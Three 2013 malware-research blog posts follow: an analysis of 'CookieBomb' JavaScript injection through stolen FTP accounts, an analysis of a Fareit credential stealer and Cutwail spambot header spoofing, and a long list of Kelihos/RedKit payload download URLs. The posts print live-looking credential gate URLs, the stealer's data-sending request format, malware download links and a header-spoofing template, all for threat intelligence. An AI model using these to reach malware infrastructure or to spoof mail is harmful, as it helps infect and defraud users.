Public announcement by #MalwareMustDie.NPO.,All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Proof of Concept of "CookieBomb" code injection attack

July 17, 2013, 4:37 am
$
0
0

This writing is actually related to the previously blogged: "A mistery of Malware URL "cnt.php" Redirection" here-->>[MMD-Blog], so I warn you.. is not new stuff, but it seems a bit difficult to make some admin to act quickly due to IR of this incident, so me and my fellow coder friend in our group tried to explain how dangerous this threat can be performed in a PoC details.

Accidentally I just handled a rush of malicious JavaScript code injections of similar cases, (without involving htaccess) and these evil code was injected to the html files which mostly are index files, with the code as per below:

This is why I have huge samples of this injection code for this research purpose.

So I collected the latest 30+ codes which I attached in the sample section for the cross analysis purpose for fellow researchers (I put different password for this sharing purpose, DM me in twitter for it):

These code was injected in the index files via FTP account (in all cases I handled) that was leaked/stolen suspected from the malware infection or by FTP bruting, or possibly by "other" vulnerabilities (which can not say it out loud yet, a different issue), with the log (thank's to the great admin who shared this) which suggesting the same auto-injection FTP tool as per previously blogged: 

[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="USER xxxxxxxx" B=- S=331
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="PASS (hidden)" B=- S=230
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="SYST" B=- S=215
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="LIST /" D= B=211 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/" D= B=630 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/data/" D= B=124 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="LIST public_html/images/" D= B=1219 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="STOR public_html/index.html-1" F=- B=- S=- T=-
Webroot was writing good article about these evil tools which is spotted used in the wild in -->>[HERE] and [HERE]

Let's go back to those injected codes. After decoded, all of these scripts came up with the with the below code, I put some explanation on the codes to grab the same perception for further explanation:

The decoded values of redirection stored in the RANDOM_2_TO_4_CHARS are as per below
(in "masked" urls): 

xp.src =    'h00p://valtechnologie.com/support/clik.php';
rr.src =    'h00p://toerkoopweb.nl/diensten/count.php';
p.src =     'h00p://abra-pc.com.br/clik.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
c.src =     'h00p://101.110.149.203/clk.php';
y.src =     'h00p://dv-suedpfalz.de/count.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
fkhd.src =  'h00p://syasinya-san.sakura.ne.jp/dtd.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
sfv.src =   'h00p://igrejabatista.comze.com/web_media/counter.php';
idqni.src = 'h00p://www.alle-vier.de/clicker.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
vaasr.src = 'h00p://www.thehornybanana.com/_vti_bin/clicker.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
dxbq.src =  'h00p://f2f365.com/counter.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
beb.src =   'h00p://avceldiamante.com/clk.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
kmqai.src = 'h00p://96.9.52.103/clik.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
ve.src =    'h00p://alldesign-jp.fool.jp/counter.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
udv.src =   'h00p://ueno-hiroshima.main.jp/dtd.php';
So we have the evil php file-names used as the landing of this redirection as; cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php, and so on. The purpose of this file naming is to camouflage its malicious action from the hacked site owners and the infected victims. The problem is if you access this url directly, it will replies you with the "OK" or other values.

So far, during pointing and cleaning these infections , even though I begged to site admins & owners for the injected code at landing page, still I was not that lucky to have these scripts however we finally understanding this malicious concept.

The concept of Cookie Bomb

I called & tagged this as #CookieBomb concept, it works like this:

The code in the template above means: When a cookie-enabled browser accessing these infected sites, the codes will be executed in JavaScript environment to check whether your browser already have a specific cookie and value , if not then that cookie will be created for you. At the same time, no matter you have the cookie or not you will be redirected to the other site via a hidden IFRAME which will replying you the dull response like below pic:

During the creation of the cookie it will be set the specific values of cookie like: 1) the cookie's (file) name, 2) special variable value, 3) the expiry date, and 4) access path. These are four important values needed for the further process.

After the redirection was made, the PHP or (Java, etc) script (masked as those cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php , and so on..) will "suppose" to check the cookie's values and its etc condition with then execute an "action" upon those condition meets which this "action" is never be good. They can execute another redirection, or a straight infection, depends on the needs of the hacker. Is a simple scheme, it works, and it is deploy-able to the mass automation scheme.

The point of the bad guys doing this is: to delay an infection, to avoid detection and alerts, on the other words: This time you need a cookie under some expiry time as "ticket" for an infection that's why I call this as Cookie Bomb.

Proof Of Concept

well, to talk is easy, proving it is another matter, we tried to make as many PoC of the above infection concept, and it works with the simple PHP code below:

Explanation:
The above PoC code is just an example. If a landing page calls the cookie and meets the same condition with the cookie's value of the previously made in injected-code's site then the malware infection or another attack can be performed. In the example I wrote a direct access to an executable malware file, many implementation of this concept can be applied.

Mitigation

To mitigate this infection case, we can search by Google the below keywords (which can be changed easily by the hackers.. so please be flexible in your greps by using regex):

Or scan it to your web site from local server. And if you find it, please decode to find the destination URL target too, for the both sites need to be cleaned from our beloved internet.
Furthermore, to fight this threat, the FTP log is really our friend for we need to know from which IP address the attack was coming, in my case mostly came from Ukrainian network

How to search this infection?

By understanding the characteristic used by this attack is not that difficult to search the infected page. Google Search or Mr. Keith Makan's GooDork is a very good tools for this purpose. Please see how the automation logic that is used to infect, seeing (1) the cookie created path value of "/" and (2) FTP hack log shown above, we know that mostly the top pages (or the file linked to the top pages like framed top/menu or scrip/css called) are aimed with the reason: the wide infection is targeted by these bad actors. We can just grep the infection string used (look at the one of above pic) and aim your dork canon into your target (ISP or Country based Geo-IP) and you will get the result almost instantly. i.e.; While writing this I was aiming the US' ISP GoDaddy and received the below infected domains which are proved infected to these attack: 

h00p://mmcmt.org/
h00p://www.wettndry.com/
h00p://gorillarobotfactory.com/
h00p://dcprevisores.com/
h00p://ip-72-167-99-107.ip.secureserver.net/
h00p://syccoservices.com/
h00p://cdijescolhacerta.casabmse.pt/
h00p://www.iimspublications.com/
h00p://www.shaversandrazor.com/
h00p://www.newlooklaser.ca/
h00p://www.smartageinsurance.com/
h00p://www.jumpshotmedia.com/
h00p://www.wolfetech.com/
h00p://bracapulco.com/
h00p://www.naturalbalancenow.com/
h00p://www.ishojtv.com/
h00p://www.sensorsadvance.com/
h00p://www.newlooklaser.ca/
h00p://bracapulco.com/
h00p://mosaicnarrative.com/
h00p://westonflmovers.com/
h00p://www.1stpagemarketingservices.com/
h00p://2528c.com/
h00p://starlighthca.com/
h00p://billymorganart.com/
h00p://flyxilla.com/
h00p://thinkingknowledge.com/
h00p://www.angelavanegas.com/
h00p://sportingdelights.com/
h00p://scholarlythinking.com/
h00p://limeworks.org/blog/wp-includes/js/comment-repl%3D/
[...]
(some of ↑these may lead to Blackhole Exploit Kit, all are infected w/redir)

Samples

We share the sample injection codes, the decode and PoC to be downloaded from-->>[HERE] for the research purpose and raising the detection ratio of this attack.

Additional

The recent changes in obfuscation (or etc changes) for this attack will be posted in this page-->>[Blog]

This post is dedicated to fellow admins, fellow IR officers who have to work non-stop to clean this threat, and special thank's to our crusader for his great help in proving the concept.

#MalwareMustDie!

How bad the Cutwail and other SpamBot can fool (spoof) us?

July 19, 2013, 1:14 am
$
0
0
As per title says, the answer is VERY bad and nasty. I took my bitter pill by analyzing this case, it is important for sharing this information since there are very lack of these in the internet, so I dare myself to write this analysis experience.

Yesterday we came into a spam malvertisement of login credential stealer (Trojan Win32/Fareit) which looks like sent from an infected PC in a local network of US's Department of Defense, and also looks relayed via their email sever. Below is the snapshot of the email:

And this is the written header for relaying this malvertisement:

You can see is a common spam of malware campaign, inside of the ZIP file there is an executable PE file which actually a Trojan Win32/Fareit, an FTP, FileZilla, Browser, Remote Directory, Email and Faceook's login credential stealer.

The distributed Trojan: Win32/Fareit

Well to be brief, the trojan itself runs as per the below video and downloading two Zeus variant malware files from remote host, send the grabbed our login data to a remote credential panel (we call it gates) URL, and in the end to make our PC becoming a part of Zeus botnet.

Below is some evidence I grabbed, the panel sent with credentials:

h00p://nursenextdoor.com:443/ponyb/gate.php
h00p://dreamonseniorswish.org:443/ponyb/gate.php
h00p://prospexleads.com:8080/ponyb/gate.php
h00p://phonebillssuck.com:8080/ponyb/gate.php
The POST method use to send the credential:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
The encoded posted traffic contains credentials:

The downloaded another files malware (ZeuS/Zbot) URL:
h00p://www.lavetrinadeidesideri.it/Twe.exe
h00p://ftp.aquasarnami.com/zKo.exe
And the HTTP method it used to download them:
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s
PoC of the downloaded Zeus:

And with be saved in here by the Win32/Fareit:

↑These are Zeus malware alright. Confused a bit with the spambot and FakeAV but thank's to Xylit0l & other friend who remind me to recheck.

The overall samples and its detection ration in VT (click the MD5) is here: 


2013/07/17 18:44 158,720 c7e5b822101343c1a4d8a2297a1a7d40 CommBank_Docs_18072013.exe 
2013/07/18 19:18 205,824 1427015ba8d9736e6329ea0444bb300c Twe.exe                    
2013/07/18 20:01 315,392 0ac084b9fa597c74ea1260ed054b126e zKo.exe
Wrote a deeper analysis of the malware attached and can be viewed here-->>[KernelMode]

How far can they spoof?

Excluding the rogue contents used in the email. It is a common practice of these scammer to spoof: (1) Sender's email address, (2) Email's message ID, (3) The mail client information or even (4) The fake MIME version used in the header (these are marked red color numbers in the below picture).

With noted: They can fake "almost" everything even like the character set used (see the blue color part), see the following explanation for this details.

If we see the email routing header used in this spam, seems like the email was relayed two times before it came to my honeypot address. Let's see the routing information clearly which I marked in the above picture in purple color highlight. The first relay (which is the lower part) looks like a client in a local network with the IP mask 192.168.8.0/24 sent this email to a reached network's MTA, in this case is: 143.214.203.103 to relay this spam to another remote MTA in 69.199.182.82 then it was relayed to my honeypot mail server to my address.

So what happen after a an unix admin or engineer after seeing this? Oh, it looks like some malware infected a client in 143.214.203.103, which after checking further is the IP 143.214.203.103 is at the US DoD's network:

OK, this was a shock and a fact that hard to believe myself, so I tweeted this as per below:

And got no response to deny this, UNTIL...

A fellow researcher (thank's to @snixerxero) contacted me for the possibility of spoofing for those email routing header. After looked back to the header again and the way it's written, I replied "No way, looks real to me, you must be wrong!", and he came with the related template of the Cutwail (Reference of Cutwail is here -->>[LINK])spambot as a PoC (with many thanks) as per I pasted below: 


Received: from [{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}] (port={NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]} 
helo=[192.168.{DIGIT[1]}.{DIGIT[1]}{DIGIT[1]}]) by {BOT_IP} with asmtp id 
1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for {MAILTO_USERNAME}@{MAILTO_DOMAIN}; {DATE}
Surprisingly THIS template match well to the values of the DoD header routing's data below: 
Received: from [143.214.203.103] (port=30877 helo=[192.168.8.11]) by 69.199.182.82 with
  asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500
This information is also breaking the ice of the template code as per below details:

1. The IP addresss spoofed template: 

{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}
please see the REGEX-like values used.

2. The port number template(format): 

{NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]
as per IP template, noted the digit per digit used to plot this number, a good hint in reversing.

3. We came into most important part, the way this spambot fakes the email relay log ID with the below template: 

by {BOT_IP} with asmtp id 1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for
This will print the fake relay log ID below: 
by 69.199.182.82 with
  asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500
Which explains us that 69.199.182.82 is the ACTUAL SpamBot IP of the Cutwail and there are never bee any relay of these malvertisement in 143.214.203.103 at all.

Mitigation

By understanding the template used by the spambots, we can do many things for blocking these spambot's malvertisement in the SMTP layer. Sadly, like happen to this case, mostly are in the crypted or encoded XML and can not be seen right away. we should pay more research attention and spread to all filtration industry the discovered spam template. for another example of ANOTHER spambot template.

Recently, we had a case where we popped and exposed one of the template while we nailed a Kuluoz network in this case here -->>[PASTEBIN].

In that case we decrypted (yes.. that one was not encoded but encrypted, so we did not decoding it) the spambot template and showing the below spoof email header as per below:

↑In this case we see the spoofing of the Outlook Express email client (MUA) used. Please noted the fake character set used.

Back to our original case, in the template at the relay log ID parts, we can see the below "static" strings used: 

with asmtp id 1rqLaL-000
and we know this is the unique string of template that I received (which was explained as Cutwail spambot's) template, so let's see "how many" and "what kind of spam" they altready sent us by using this template. I just grep that static strings into my spam database (is a mailbox collection I made of those botnet sent garbage to my honeypot) as per picture below:

These are the snapshots of recent ones (click to enlarge the picture) :

See the one with my name printed in the zip file?
One of the spambot template is implemented in he attachment filename, to be precise, like this one:

The above additional three samples are attached with Fareit, Fareit and Fareit.

So we know each other now (smile), and we know also WHO's crime group moronz is using WHAT and spreading WHICH malware mess now. We're getting closer to nail these scums for good. To these moronz, go and send me more of your spams! :-)

Sample

We share this information to common people and security researcher for raising the understanding & detection ratio in the SMTP methodology filtration for these threat.

I attached the samples I gain for the research purpose only by security experts in here-->>[MediaFire]

#MalwareMustDie!

Additional:
I credit the wonderful support from all fellow researchers who help this analysis and MalwareMustDie project in general, we won't make it this far without all of you.

I dedicated this writing to the incoming event of DEF CON and BlackHat 2013, I am still struggling to figure how to attend it, hopefully I can make it, God knows how much I wanted to go and meet many good friends in there (believe me), is just my health and my tight day work schedule is an obstacle to overcome.. But if I can't make it I will surely go to DerbyCon this year.

#Alert - Kelihos payload download zone in .RU 93 domains still ALIVE - RedKit EK #malware distribution!

July 19, 2013, 4:52 am
$
0
0
We detected massive infection of RedKit in Japan as per posted by our Japanese team here -->>[0day.jp]
The Red Kit attack was targeting innocent popular sites like site of happiness relation of mother and child and the office document navigation as per snapshot below (we detected 54 sites of 214 urls are infected): And after cracking the exploit code we found these are the payload used:

and

We always urge the our team to post the infection url into URLquery for the sorting 6 PoC purpose, so does this case, the total URL grepped in two days ago are: 
// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe[/code] Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*

0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
